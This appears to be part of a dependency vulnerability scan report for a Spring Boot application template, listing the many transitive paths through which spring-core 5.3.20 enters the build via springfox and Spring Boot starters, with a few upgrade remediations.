  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
